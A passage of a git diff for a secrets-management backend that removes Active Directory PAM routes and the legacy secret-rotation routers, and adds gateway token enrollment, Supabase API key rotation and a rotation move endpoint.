limit, + offset, + orderBy, + orderDirection, + filterDomainTypes, + actor: req.permission.type, + actorId: req.permission.id, + actorAuthMethod: req.permission.authMethod, + actorOrgId: req.permission.orgId, + discoveryFingerprint + }); + + await server.services.auditLog.createAuditLog({ + ...req.auditLogInfo, + orgId: req.permission.orgId, + 
projectId, + event: { + type: EventType.PAM_DOMAIN_LIST, + metadata: { + count: domains.length + } + } + }); + + return { domains, totalCount }; + } + }); +}; diff --git a/backend/src/ee/routes/v1/pam-resource-routers/index.ts b/backend/src/ee/routes/v1/pam-resource-routers/index.ts index 0fdc50ca5ce..ef58df57d7e 100644 --- a/backend/src/ee/routes/v1/pam-resource-routers/index.ts +++ b/backend/src/ee/routes/v1/pam-resource-routers/index.ts @@ -1,8 +1,3 @@ -import { - CreateActiveDirectoryResourceSchema, - SanitizedActiveDirectoryResourceSchema, - UpdateActiveDirectoryResourceSchema -} from "@app/ee/services/pam-resource/active-directory/active-directory-resource-schemas"; import { CreateAwsIamResourceSchema, SanitizedAwsIamResourceSchema, @@ -51,7 +46,6 @@ import { } from "@app/ee/services/pam-resource/windows-server/windows-server-resource-schemas"; import { - registerActiveDirectoryRelatedResourcesEndpoint, registerPamResourceEndpoints, registerSshCaPublicKeyEndpoint, registerSshCaSetupEndpoint @@ -140,15 +134,5 @@ export const PAM_RESOURCE_REGISTER_ROUTER_MAP: Record { - registerPamResourceEndpoints({ - server, - resourceType: PamResource.ActiveDirectory, - resourceResponseSchema: SanitizedActiveDirectoryResourceSchema, - createResourceSchema: CreateActiveDirectoryResourceSchema, - updateResourceSchema: UpdateActiveDirectoryResourceSchema - }); - registerActiveDirectoryRelatedResourcesEndpoint(server); } }; diff --git a/backend/src/ee/routes/v1/pam-resource-routers/pam-resource-endpoints.ts b/backend/src/ee/routes/v1/pam-resource-routers/pam-resource-endpoints.ts index a9d89327b95..486a6a13ee0 100644 --- a/backend/src/ee/routes/v1/pam-resource-routers/pam-resource-endpoints.ts +++ b/backend/src/ee/routes/v1/pam-resource-routers/pam-resource-endpoints.ts @@ -3,7 +3,6 @@ import { z } from "zod"; import { EventType } from "@app/ee/services/audit-log/audit-log-types"; import { PamResource } from "@app/ee/services/pam-resource/pam-resource-enums"; import { 
TPamResource } from "@app/ee/services/pam-resource/pam-resource-types"; -import { SanitizedWindowsResourceSchema } from "@app/ee/services/pam-resource/windows-server/windows-server-resource-schemas"; import { readLimit, writeLimit } from "@app/server/config/rateLimiter"; import { getTelemetryDistinctId } from "@app/server/lib/telemetry"; import { verifyAuth } from "@app/server/plugins/auth/verify-auth"; @@ -360,31 +359,3 @@ echo "" } }); }; - -export const registerActiveDirectoryRelatedResourcesEndpoint = (server: FastifyZodProvider) => { - server.route({ - method: "GET", - url: "/:resourceId/related-resources", - config: { - rateLimit: readLimit - }, - schema: { - operationId: "getActiveDirectoryRelatedResources", - description: "List resources that belong to this Active Directory domain", - params: z.object({ - resourceId: z.string().uuid() - }), - response: { - 200: z.object({ - resources: SanitizedWindowsResourceSchema.array() - }) - } - }, - onRequest: verifyAuth([AuthMode.JWT]), - handler: async (req) => { - const resources = await server.services.pamResource.listRelatedResources(req.params.resourceId, req.permission); - - return { resources }; - } - }); -}; diff --git a/backend/src/ee/routes/v1/pam-resource-routers/pam-resource-router.ts b/backend/src/ee/routes/v1/pam-resource-routers/pam-resource-router.ts index 4550328310a..6726a6db9cd 100644 --- a/backend/src/ee/routes/v1/pam-resource-routers/pam-resource-router.ts +++ b/backend/src/ee/routes/v1/pam-resource-routers/pam-resource-router.ts @@ -2,10 +2,6 @@ import { z } from "zod"; import { PamAccountDependenciesSchema } from "@app/db/schemas"; import { EventType } from "@app/ee/services/audit-log/audit-log-types"; -import { - ActiveDirectoryResourceListItemSchema, - SanitizedActiveDirectoryResourceSchema -} from "@app/ee/services/pam-resource/active-directory/active-directory-resource-schemas"; import { AwsIamResourceListItemSchema, SanitizedAwsIamResourceSchema @@ -58,8 +54,7 @@ const 
SanitizedResourceSchema = z.discriminatedUnion("resourceType", [ SanitizedAwsIamResourceSchema, SanitizedMongoDBResourceSchema, SanitizedRedisResourceSchema, - SanitizedWindowsResourceSchema, - SanitizedActiveDirectoryResourceSchema + SanitizedWindowsResourceSchema ]); const SanitizedResourceWithFavoriteSchema = z.intersection( @@ -76,8 +71,7 @@ const ResourceOptionsSchema = z.discriminatedUnion("resource", [ AwsIamResourceListItemSchema, MongoDBResourceListItemSchema, RedisResourceListItemSchema, - WindowsResourceListItemSchema, - ActiveDirectoryResourceListItemSchema + WindowsResourceListItemSchema ]); export const registerPamResourceRouter = async (server: FastifyZodProvider) => { diff --git a/backend/src/ee/routes/v1/pam-session-router.ts b/backend/src/ee/routes/v1/pam-session-router.ts index 3e491cd51a0..d894aa3dac6 100644 --- a/backend/src/ee/routes/v1/pam-session-router.ts +++ b/backend/src/ee/routes/v1/pam-session-router.ts @@ -56,7 +56,7 @@ export const registerPamSessionRouter = async (server: FastifyZodProvider) => { }) } }, - onRequest: verifyAuth([AuthMode.IDENTITY_ACCESS_TOKEN]), + onRequest: verifyAuth([AuthMode.IDENTITY_ACCESS_TOKEN, AuthMode.GATEWAY_ACCESS_TOKEN]), handler: async (req) => { const { credentials, policyRules, projectId, account, sessionStarted } = await server.services.pamAccount.getSessionCredentials(req.params.sessionId, req.permission); @@ -130,7 +130,7 @@ export const registerPamSessionRouter = async (server: FastifyZodProvider) => { }) } }, - onRequest: verifyAuth([AuthMode.IDENTITY_ACCESS_TOKEN]), + onRequest: verifyAuth([AuthMode.IDENTITY_ACCESS_TOKEN, AuthMode.GATEWAY_ACCESS_TOKEN]), handler: async (req) => { const { session, projectId } = await server.services.pamSession.updateLogsById( { @@ -177,7 +177,7 @@ export const registerPamSessionRouter = async (server: FastifyZodProvider) => { }) } }, - onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]), + onRequest: verifyAuth([AuthMode.JWT, 
AuthMode.IDENTITY_ACCESS_TOKEN, AuthMode.GATEWAY_ACCESS_TOKEN]), handler: async (req) => { const { session, projectId, alreadyEnded } = await server.services.pamSession.endSessionById( req.params.sessionId, @@ -384,7 +384,7 @@ export const registerPamSessionRouter = async (server: FastifyZodProvider) => { 200: z.object({ ok: z.literal(true) }) } }, - onRequest: verifyAuth([AuthMode.IDENTITY_ACCESS_TOKEN]), + onRequest: verifyAuth([AuthMode.IDENTITY_ACCESS_TOKEN, AuthMode.GATEWAY_ACCESS_TOKEN]), handler: async (req) => { const EventBatchSchema = z.array(z.union([PamSessionCommandLogSchema, TerminalEventSchema, HttpEventSchema])); try { diff --git a/backend/src/ee/routes/v1/project-template-router.ts b/backend/src/ee/routes/v1/project-template-router.ts index 3f5c58e9cfe..10bf1d0b571 100644 --- a/backend/src/ee/routes/v1/project-template-router.ts +++ b/backend/src/ee/routes/v1/project-template-router.ts @@ -17,7 +17,7 @@ const isReservedRoleSlug = (slug: string) => Object.values(ProjectMembershipRole).includes(slug as ProjectMembershipRole); const isReservedRoleName = (name: string) => - ["custom", "admin", "viewer", "developer", "no access"].includes(name.toLowerCase()); + ["custom", "admin", "viewer", "member", "no access"].includes(name.toLowerCase()); const SanitizedProjectTemplateSchema = ProjectTemplatesSchema.extend({ roles: z diff --git a/backend/src/ee/routes/v1/relay-router.ts b/backend/src/ee/routes/v1/relay-router.ts index 89b2a9531bf..66e6640e45c 100644 --- a/backend/src/ee/routes/v1/relay-router.ts +++ b/backend/src/ee/routes/v1/relay-router.ts @@ -114,7 +114,7 @@ export const registerRelayRouter = async (server: FastifyZodProvider) => { config: { rateLimit: readLimit }, - onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]), + onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN, AuthMode.GATEWAY_ACCESS_TOKEN]), handler: async (req) => { return server.services.relay.getRelays({ actorId: req.permission.id, diff --git 
a/backend/src/ee/routes/v1/secret-approval-request-router.ts b/backend/src/ee/routes/v1/secret-approval-request-router.ts index 1822e53ed23..19a26d6d6ee 100644 --- a/backend/src/ee/routes/v1/secret-approval-request-router.ts +++ b/backend/src/ee/routes/v1/secret-approval-request-router.ts @@ -133,7 +133,7 @@ export const registerSecretApprovalRequestRouter = async (server: FastifyZodProv id: z.string() }), body: z.object({ - bypassReason: z.string().optional() + bypassReason: z.string().max(1000).optional() }), response: { 200: z.object({ diff --git a/backend/src/ee/routes/v1/secret-rotation-provider-router.ts b/backend/src/ee/routes/v1/secret-rotation-provider-router.ts deleted file mode 100644 index e6a1ac72bcc..00000000000 --- a/backend/src/ee/routes/v1/secret-rotation-provider-router.ts +++ /dev/null @@ -1,45 +0,0 @@ -import { z } from "zod"; - -import { readLimit } from "@app/server/config/rateLimiter"; -import { verifyAuth } from "@app/server/plugins/auth/verify-auth"; -import { AuthMode } from "@app/services/auth/auth-type"; - -export const registerSecretRotationProviderRouter = async (server: FastifyZodProvider) => { - server.route({ - method: "GET", - url: "/:workspaceId", - config: { - rateLimit: readLimit - }, - schema: { - params: z.object({ - workspaceId: z.string().trim() - }), - response: { - 200: z.object({ - providers: z - .object({ - name: z.string(), - title: z.string(), - image: z.string().optional(), - description: z.string().optional(), - template: z.any(), - isDeprecated: z.boolean().optional() - }) - .array() - }) - } - }, - onRequest: verifyAuth([AuthMode.JWT]), - handler: async (req) => { - const providers = await server.services.secretRotation.getProviderTemplates({ - actor: req.permission.type, - actorId: req.permission.id, - actorAuthMethod: req.permission.authMethod, - actorOrgId: req.permission.orgId, - projectId: req.params.workspaceId - }); - return providers; - } - }); -}; diff --git 
a/backend/src/ee/routes/v1/secret-rotation-router.ts b/backend/src/ee/routes/v1/secret-rotation-router.ts deleted file mode 100644 index 936459fa162..00000000000 --- a/backend/src/ee/routes/v1/secret-rotation-router.ts +++ /dev/null @@ -1,176 +0,0 @@ -import { z } from "zod"; - -import { SecretRotationOutputsSchema, SecretRotationsSchema } from "@app/db/schemas"; -import { removeTrailingSlash } from "@app/lib/fn"; -import { readLimit, writeLimit } from "@app/server/config/rateLimiter"; -import { verifyAuth } from "@app/server/plugins/auth/verify-auth"; -import { AuthMode } from "@app/services/auth/auth-type"; - -export const registerSecretRotationRouter = async (server: FastifyZodProvider) => { - server.route({ - method: "POST", - url: "/", - config: { - rateLimit: writeLimit - }, - schema: { - body: z.object({ - workspaceId: z.string().trim(), - secretPath: z.string().trim().transform(removeTrailingSlash), - environment: z.string().trim(), - interval: z.number().min(1), - provider: z.string().trim(), - customProvider: z.string().trim().optional(), - inputs: z.record(z.unknown()), - outputs: z.record(z.string()) - }), - response: { - 200: z.object({ - secretRotation: SecretRotationsSchema.merge( - z.object({ - environment: z.object({ - id: z.string(), - name: z.string(), - slug: z.string() - }), - outputs: SecretRotationOutputsSchema.array() - }) - ) - }) - } - }, - onRequest: verifyAuth([AuthMode.JWT]), - handler: async (req) => { - const secretRotation = await server.services.secretRotation.createRotation({ - actor: req.permission.type, - actorAuthMethod: req.permission.authMethod, - actorId: req.permission.id, - actorOrgId: req.permission.orgId, - ...req.body, - projectId: req.body.workspaceId - }); - return { secretRotation }; - } - }); - - server.route({ - url: "/restart", - method: "POST", - config: { - rateLimit: writeLimit - }, - schema: { - body: z.object({ - id: z.string().trim() - }), - response: { - 200: z.object({ - secretRotation: 
SecretRotationsSchema.merge( - z.object({ - environment: z.object({ - id: z.string(), - name: z.string(), - slug: z.string() - }) - }) - ) - }) - } - }, - onRequest: verifyAuth([AuthMode.JWT]), - handler: async (req) => { - const secretRotation = await server.services.secretRotation.restartById({ - actor: req.permission.type, - actorId: req.permission.id, - actorAuthMethod: req.permission.authMethod, - actorOrgId: req.permission.orgId, - rotationId: req.body.id - }); - return { secretRotation }; - } - }); - - server.route({ - url: "/", - method: "GET", - config: { - rateLimit: readLimit - }, - schema: { - querystring: z.object({ - workspaceId: z.string().trim() - }), - response: { - 200: z.object({ - secretRotations: SecretRotationsSchema.merge( - z.object({ - environment: z.object({ - id: z.string(), - name: z.string(), - slug: z.string() - }), - outputs: z - .object({ - key: z.string(), - secret: z.object({ - secretKey: z.string(), - id: z.string(), - version: z.number() - }) - }) - .array() - }) - ).array() - }) - } - }, - onRequest: verifyAuth([AuthMode.JWT]), - handler: async (req) => { - const secretRotations = await server.services.secretRotation.getByProjectId({ - actor: req.permission.type, - actorId: req.permission.id, - actorAuthMethod: req.permission.authMethod, - actorOrgId: req.permission.orgId, - projectId: req.query.workspaceId - }); - return { secretRotations }; - } - }); - - server.route({ - method: "DELETE", - url: "/:id", - config: { - rateLimit: writeLimit - }, - schema: { - params: z.object({ - id: z.string().trim() - }), - response: { - 200: z.object({ - secretRotation: SecretRotationsSchema.merge( - z.object({ - environment: z.object({ - id: z.string(), - name: z.string(), - slug: z.string() - }) - }) - ) - }) - } - }, - onRequest: verifyAuth([AuthMode.JWT]), - handler: async (req) => { - const secretRotation = await server.services.secretRotation.deleteById({ - actor: req.permission.type, - actorId: req.permission.id, - actorAuthMethod: 
req.permission.authMethod, - actorOrgId: req.permission.orgId, - rotationId: req.params.id - }); - return { secretRotation }; - } - }); -}; diff --git a/backend/src/ee/routes/v1/secret-version-router.ts b/backend/src/ee/routes/v1/secret-version-router.ts index a09a05c91a1..2c768fb0eb5 100644 --- a/backend/src/ee/routes/v1/secret-version-router.ts +++ b/backend/src/ee/routes/v1/secret-version-router.ts @@ -18,7 +18,7 @@ export const registerSecretVersionRouter = async (server: FastifyZodProvider) => }), querystring: z.object({ offset: z.coerce.number(), - limit: z.coerce.number() + limit: z.coerce.number().max(1000) }), response: { 200: z.object({ diff --git a/backend/src/ee/routes/v2/gateway-router.ts b/backend/src/ee/routes/v2/gateway-router.ts index f72ec9b3f46..ccf9d5e3a0f 100644 --- a/backend/src/ee/routes/v2/gateway-router.ts +++ b/backend/src/ee/routes/v2/gateway-router.ts @@ -47,17 +47,16 @@ export const registerGatewayV2Router = async (server: FastifyZodProvider) => { config: { rateLimit: writeLimit }, - onRequest: verifyAuth([AuthMode.IDENTITY_ACCESS_TOKEN]), + onRequest: verifyAuth([AuthMode.IDENTITY_ACCESS_TOKEN, AuthMode.GATEWAY_ACCESS_TOKEN]), handler: async (req) => { - const gateway = await server.services.gatewayV2.registerGateway({ + return server.services.gatewayV2.registerGateway({ orgId: req.permission.orgId, relayName: req.body.relayName, actorId: req.permission.id, + actorType: req.permission.type, actorAuthMethod: req.permission.authMethod, name: req.body.name }); - - return gateway; } }); @@ -75,7 +74,7 @@ export const registerGatewayV2Router = async (server: FastifyZodProvider) => { }) } }, - onRequest: verifyAuth([AuthMode.IDENTITY_ACCESS_TOKEN]), + onRequest: verifyAuth([AuthMode.IDENTITY_ACCESS_TOKEN, AuthMode.GATEWAY_ACCESS_TOKEN]), handler: async (req) => { await server.services.gatewayV2.heartbeat({ orgPermission: req.permission @@ -92,11 +91,9 @@ export const registerGatewayV2Router = async (server: FastifyZodProvider) => { 
operationId: "listGateways", response: { 200: SanitizedGatewayV2Schema.extend({ - identity: z.object({ - name: z.string(), - id: z.string() - }), - connectedResourcesCount: z.number() + identity: z.object({ name: z.string(), id: z.string() }).nullable(), + connectedResourcesCount: z.number(), + enrollmentTokenStatus: z.enum(["pending", "expired"]).nullable() }).array() } }, @@ -178,7 +175,7 @@ export const registerGatewayV2Router = async (server: FastifyZodProvider) => { 200: zodBuffer } }, - onRequest: verifyAuth([AuthMode.IDENTITY_ACCESS_TOKEN]), + onRequest: verifyAuth([AuthMode.IDENTITY_ACCESS_TOKEN, AuthMode.GATEWAY_ACCESS_TOKEN]), handler: async (req) => { const pamSessionKey = await server.services.gatewayV2.getPamSessionKey({ orgPermission: req.permission diff --git a/backend/src/ee/routes/v2/secret-rotation-v2-routers/index.ts b/backend/src/ee/routes/v2/secret-rotation-v2-routers/index.ts index cfc80dca09f..07cef7ba2c5 100644 --- a/backend/src/ee/routes/v2/secret-rotation-v2-routers/index.ts +++ b/backend/src/ee/routes/v2/secret-rotation-v2-routers/index.ts @@ -15,6 +15,7 @@ import { registerOpenRouterApiKeyRotationRouter } from "./open-router-api-key-ro import { registerOracleDBCredentialsRotationRouter } from "./oracledb-credentials-rotation-router"; import { registerPostgresCredentialsRotationRouter } from "./postgres-credentials-rotation-router"; import { registerRedisCredentialsRotationRouter } from "./redis-credentials-rotation-router"; +import { registerSupabaseApiKeyRotationRouter } from "./supabase-api-key-rotation-router"; import { registerUnixLinuxLocalAccountRotationRouter } from "./unix-linux-local-account-rotation-router"; import { registerWindowsLocalAccountRotationRouter } from "./windows-local-account-rotation-router"; @@ -40,5 +41,6 @@ export const SECRET_ROTATION_REGISTER_ROUTER_MAP: Record< [SecretRotation.DbtServiceToken]: registerDbtServiceTokenRotationRouter, [SecretRotation.WindowsLocalAccount]: 
registerWindowsLocalAccountRotationRouter, [SecretRotation.OpenRouterApiKey]: registerOpenRouterApiKeyRotationRouter, - [SecretRotation.HpIloLocalAccount]: registerHpIloRotationRouter + [SecretRotation.HpIloLocalAccount]: registerHpIloRotationRouter, + [SecretRotation.SupabaseApiKey]: registerSupabaseApiKeyRotationRouter }; diff --git a/backend/src/ee/routes/v2/secret-rotation-v2-routers/secret-rotation-v2-endpoints.ts b/backend/src/ee/routes/v2/secret-rotation-v2-routers/secret-rotation-v2-endpoints.ts index de8d27e2ec0..08a305576b5 100644 --- a/backend/src/ee/routes/v2/secret-rotation-v2-routers/secret-rotation-v2-endpoints.ts +++ b/backend/src/ee/routes/v2/secret-rotation-v2-routers/secret-rotation-v2-endpoints.ts @@ -452,6 +452,62 @@ export const registerSecretRotationEndpoints = < } }); + server.route({ + method: "POST", + url: "/:rotationId/move", + config: { + rateLimit: writeLimit + }, + schema: { + hide: false, + operationId: `move${rotationTypeId}Rotation`, + tags: [ApiDocsTags.SecretRotations], + description: `Move the specified ${rotationType} Rotation to a different secret path or environment.`, + params: z.object({ + rotationId: z.string().uuid().describe(SecretRotations.UPDATE(type).rotationId) + }), + body: z.object({ + destinationEnvironment: z.string().trim().min(1, "Destination environment required"), + destinationSecretPath: z.string().trim().min(1, "Destination secret path required"), + overwriteDestination: z.boolean().default(false) + }), + response: { + 200: z.object({ secretRotation: responseSchema }) + } + }, + onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]), + handler: async (req) => { + const { rotationId } = req.params; + const { destinationEnvironment, destinationSecretPath, overwriteDestination } = req.body; + + const { secretRotation, sourceEnvironment, sourceSecretPath } = + await server.services.secretRotationV2.moveSecretRotation( + { rotationId, type, destinationEnvironment, destinationSecretPath, 
overwriteDestination }, + req.permission + ); + + const movedRotation = secretRotation as T; + + await server.services.auditLog.createAuditLog({ + ...req.auditLogInfo, + projectId: movedRotation.projectId, + event: { + type: EventType.MOVE_SECRET_ROTATION, + metadata: { + type, + rotationId, + sourceEnvironment, + sourceSecretPath, + destinationEnvironment, + destinationSecretPath + } + } + }); + + return { secretRotation: movedRotation }; + } + }); + server.route({ method: "POST", url: "/:rotationId/rotate-secrets", diff --git a/backend/src/ee/routes/v2/secret-rotation-v2-routers/secret-rotation-v2-router.ts b/backend/src/ee/routes/v2/secret-rotation-v2-routers/secret-rotation-v2-router.ts index bea58740206..e5ff3d6d48c 100644 --- a/backend/src/ee/routes/v2/secret-rotation-v2-routers/secret-rotation-v2-router.ts +++ b/backend/src/ee/routes/v2/secret-rotation-v2-routers/secret-rotation-v2-router.ts @@ -17,6 +17,7 @@ import { OracleDBCredentialsRotationListItemSchema } from "@app/ee/services/secr import { PostgresCredentialsRotationListItemSchema } from "@app/ee/services/secret-rotation-v2/postgres-credentials"; import { RedisCredentialsRotationListItemSchema } from "@app/ee/services/secret-rotation-v2/redis-credentials"; import { SecretRotationV2Schema } from "@app/ee/services/secret-rotation-v2/secret-rotation-v2-union-schema"; +import { SupabaseApiKeyRotationListItemSchema } from "@app/ee/services/secret-rotation-v2/supabase-api-key"; import { UnixLinuxLocalAccountRotationListItemSchema } from "@app/ee/services/secret-rotation-v2/unix-linux-local-account-rotation"; import { WindowsLocalAccountRotationListItemSchema } from "@app/ee/services/secret-rotation-v2/windows-local-account-rotation"; import { ApiDocsTags, SecretRotations } from "@app/lib/api-docs"; @@ -41,7 +42,8 @@ const SecretRotationV2OptionsSchema = z.discriminatedUnion("type", [ DbtServiceTokenRotationListItemSchema, WindowsLocalAccountRotationListItemSchema, OpenRouterApiKeyRotationListItemSchema, - 
HpIloRotationListItemSchema + HpIloRotationListItemSchema, + SupabaseApiKeyRotationListItemSchema ]); export const registerSecretRotationV2Router = async (server: FastifyZodProvider) => { diff --git a/backend/src/ee/routes/v2/secret-rotation-v2-routers/supabase-api-key-rotation-router.ts b/backend/src/ee/routes/v2/secret-rotation-v2-routers/supabase-api-key-rotation-router.ts new file mode 100644 index 00000000000..d16fabb7e0b --- /dev/null +++ b/backend/src/ee/routes/v2/secret-rotation-v2-routers/supabase-api-key-rotation-router.ts @@ -0,0 +1,19 @@ +import { SecretRotation } from "@app/ee/services/secret-rotation-v2/secret-rotation-v2-enums"; +import { + CreateSupabaseApiKeyRotationSchema, + SupabaseApiKeyRotationGeneratedCredentialsSchema, + SupabaseApiKeyRotationSchema, + UpdateSupabaseApiKeyRotationSchema +} from "@app/ee/services/secret-rotation-v2/supabase-api-key"; + +import { registerSecretRotationEndpoints } from "./secret-rotation-v2-endpoints"; + +export const registerSupabaseApiKeyRotationRouter = async (server: FastifyZodProvider) => + registerSecretRotationEndpoints({ + type: SecretRotation.SupabaseApiKey, + server, + responseSchema: SupabaseApiKeyRotationSchema, + createSchema: CreateSupabaseApiKeyRotationSchema, + updateSchema: UpdateSupabaseApiKeyRotationSchema, + generatedCredentialsSchema: SupabaseApiKeyRotationGeneratedCredentialsSchema + }); diff --git a/backend/src/ee/routes/v3/gateway-router.ts b/backend/src/ee/routes/v3/gateway-router.ts new file mode 100644 index 00000000000..eea110b64f3 --- /dev/null +++ b/backend/src/ee/routes/v3/gateway-router.ts @@ -0,0 +1,186 @@ +import z from "zod"; + +import { GatewaysV2Schema } from "@app/db/schemas"; +import { EventType, UserAgentType } from "@app/ee/services/audit-log/audit-log-types"; +import { writeLimit } from "@app/server/config/rateLimiter"; +import { slugSchema } from "@app/server/lib/schemas"; +import { verifyAuth } from "@app/server/plugins/auth/verify-auth"; +import { ActorType, AuthMode 
} from "@app/services/auth/auth-type"; + +const enrollRateLimit = { windowMs: 60 * 1000, max: 10 }; + +const SanitizedGatewayV2Schema = GatewaysV2Schema.pick({ + id: true, + identityId: true, + name: true, + createdAt: true, + updatedAt: true, + heartbeat: true, + lastHealthCheckStatus: true +}); + +export const registerGatewayV3Router = async (server: FastifyZodProvider) => { + // Create a gateway + server.route({ + method: "POST", + url: "/", + config: { rateLimit: writeLimit }, + schema: { + operationId: "createGateway", + body: z.object({ + name: slugSchema({ min: 1, max: 64, field: "name" }) + }), + response: { + 200: SanitizedGatewayV2Schema + } + }, + onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]), + handler: async (req) => { + const gateway = await server.services.gatewayV2.createGateway({ + orgId: req.permission.orgId, + actorId: req.permission.id, + actorType: req.permission.type, + actorAuthMethod: req.permission.authMethod, + name: req.body.name + }); + + await server.services.auditLog.createAuditLog({ + ...req.auditLogInfo, + orgId: req.permission.orgId, + event: { + type: EventType.GATEWAY_CREATE, + metadata: { + gatewayId: gateway.id, + name: req.body.name + } + } + }); + + return gateway; + } + }); + + // Generate enrollment token for a gateway + server.route({ + method: "POST", + url: "/:gatewayId/token-auth/configure", + config: { rateLimit: writeLimit }, + schema: { + operationId: "configureGatewayTokenAuth", + params: z.object({ + gatewayId: z.string().uuid() + }), + response: { + 200: z.object({ + token: z.string(), + expiresAt: z.date() + }) + } + }, + onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]), + handler: async (req) => { + const result = await server.services.gatewayV2.configureTokenAuth({ + orgPermission: req.permission, + gatewayId: req.params.gatewayId + }); + + await server.services.auditLog.createAuditLog({ + ...req.auditLogInfo, + orgId: req.permission.orgId, + event: { + type: 
EventType.GATEWAY_ENROLLMENT_TOKEN_CREATE, + metadata: { + tokenId: result.id, + name: result.gatewayName + } + } + }); + + return { token: result.token, expiresAt: result.expiresAt }; + } + }); + + // Enroll a gateway using a token (unauthenticated) + server.route({ + method: "POST", + url: "/token-auth/enroll", + config: { rateLimit: enrollRateLimit }, + schema: { + operationId: "enrollGatewayWithToken", + body: z.object({ + token: z.string().min(1) + }), + response: { + 200: z.object({ + accessToken: z.string(), + gatewayId: z.string() + }) + } + }, + handler: async (req) => { + const result = await server.services.gatewayV2.enrollGateway({ + token: req.body.token + }); + + await server.services.auditLog + .createAuditLog({ + orgId: result.orgId, + actor: { + type: ActorType.GATEWAY, + metadata: { gatewayId: result.gatewayId } + }, + event: { + type: EventType.GATEWAY_ENROLL, + metadata: { + gatewayId: result.gatewayId, + name: result.gatewayName + } + }, + ipAddress: req.ip, + userAgent: req.headers["user-agent"] ?? 
"", + userAgentType: UserAgentType.CLI + }) + .catch(() => {}); + + return result; + } + }); + + // Connect (refresh certs) for an enrolled gateway + server.route({ + method: "POST", + url: "/connect", + config: { rateLimit: writeLimit }, + schema: { + operationId: "connectGateway", + body: z.object({ + relayName: slugSchema({ min: 1, max: 32, field: "relayName" }).optional() + }), + response: { + 200: z.object({ + gatewayId: z.string(), + relayHost: z.string(), + pki: z.object({ + serverCertificate: z.string(), + serverPrivateKey: z.string(), + clientCertificateChain: z.string() + }), + ssh: z.object({ + clientCertificate: z.string(), + clientPrivateKey: z.string(), + serverCAPublicKey: z.string() + }) + }) + } + }, + onRequest: verifyAuth([AuthMode.GATEWAY_ACCESS_TOKEN]), + handler: async (req) => { + return server.services.gatewayV2.connectGateway({ + orgId: req.permission.orgId, + actorId: req.permission.id, + actorType: req.permission.type, + relayName: req.body.relayName + }); + } + }); +}; diff --git a/backend/src/ee/routes/v3/index.ts b/backend/src/ee/routes/v3/index.ts new file mode 100644 index 00000000000..84514752a00 --- /dev/null +++ b/backend/src/ee/routes/v3/index.ts @@ -0,0 +1,5 @@ +import { registerGatewayV3Router } from "./gateway-router"; + +export const registerV3EERoutes = async (server: FastifyZodProvider) => { + await server.register(registerGatewayV3Router, { prefix: "/gateways" }); +}; diff --git a/backend/src/ee/services/access-approval-request/access-approval-request-dal.ts b/backend/src/ee/services/access-approval-request/access-approval-request-dal.ts index 1fd0bd7b287..996afb62ee7 100644 --- a/backend/src/ee/services/access-approval-request/access-approval-request-dal.ts +++ b/backend/src/ee/services/access-approval-request/access-approval-request-dal.ts @@ -260,7 +260,7 @@ export interface TAccessApprovalRequestDALFactory extends Omit; - getCount: ({ projectId }: { projectId: string; policyId?: string }) => Promise<{ + getCount: ({ 
projectId }: { projectId: string; policyId?: string; requestedByUserId?: string }) => Promise<{ pendingCount: number; finalizedCount: number; }>; @@ -872,7 +872,7 @@ export const accessApprovalRequestDALFactory = (db: TDbClient): TAccessApprovalR } }; - const getCount: TAccessApprovalRequestDALFactory["getCount"] = async ({ projectId, policyId }) => { + const getCount: TAccessApprovalRequestDALFactory["getCount"] = async ({ projectId, policyId, requestedByUserId }) => { try { const accessRequests = await db .replicaNode()(TableName.AccessApprovalRequest) @@ -895,7 +895,12 @@ export const accessApprovalRequestDALFactory = (db: TDbClient): TAccessApprovalR ) .where(`${TableName.Environment}.projectId`, projectId) .where((qb) => { - if (policyId) void qb.where(`${TableName.AccessApprovalPolicy}.id`, policyId); + if (policyId) { + void qb.where(`${TableName.AccessApprovalPolicy}.id`, policyId); + } + if (requestedByUserId) { + void qb.where(`${TableName.AccessApprovalRequest}.requestedByUserId`, requestedByUserId); + } }) .select(selectAllTableCols(TableName.AccessApprovalRequest)) .select(db.ref("status").withSchema(TableName.AccessApprovalRequestReviewer).as("reviewerStatus")) diff --git a/backend/src/ee/services/access-approval-request/access-approval-request-service.ts b/backend/src/ee/services/access-approval-request/access-approval-request-service.ts index 9450737f101..aa81b0be873 100644 --- a/backend/src/ee/services/access-approval-request/access-approval-request-service.ts +++ b/backend/src/ee/services/access-approval-request/access-approval-request-service.ts @@ -8,6 +8,8 @@ import { BadRequestError, ForbiddenRequestError, NotFoundError } from "@app/lib/ import { groupBy } from "@app/lib/fn"; import { ms } from "@app/lib/ms"; import { alphaNumericNanoId } from "@app/lib/nanoid"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { EnforcementLevel } from 
"@app/lib/types"; import { triggerWorkflowIntegrationNotification } from "@app/lib/workflow-integrations/trigger-notification"; import { TriggerFeature } from "@app/lib/workflow-integrations/types"; @@ -27,7 +29,11 @@ import { TAccessApprovalPolicyApproverDALFactory } from "../access-approval-poli import { TAccessApprovalPolicyDALFactory } from "../access-approval-policy/access-approval-policy-dal"; import { TGroupDALFactory } from "../group/group-dal"; import { TPermissionServiceFactory } from "../permission/permission-service-types"; -import { ProjectPermissionMemberActions, ProjectPermissionSub } from "../permission/project-permission"; +import { + ProjectPermissionApprovalRequestActions, + ProjectPermissionMemberActions, + ProjectPermissionSub +} from "../permission/project-permission"; import { TAccessApprovalRequestDALFactory } from "./access-approval-request-dal"; import { verifyRequestedPermissions } from "./access-approval-request-fns"; import { TAccessApprovalRequestReviewerDALFactory } from "./access-approval-request-reviewer-dal"; @@ -35,7 +41,7 @@ import { ApprovalStatus, TAccessApprovalRequestServiceFactory } from "./access-a type TSecretApprovalRequestServiceFactoryDep = { additionalPrivilegeDAL: Pick; - permissionService: Pick; + permissionService: Pick; accessApprovalPolicyApproverDAL: Pick; projectEnvDAL: Pick; projectDAL: Pick< @@ -339,7 +345,9 @@ export const 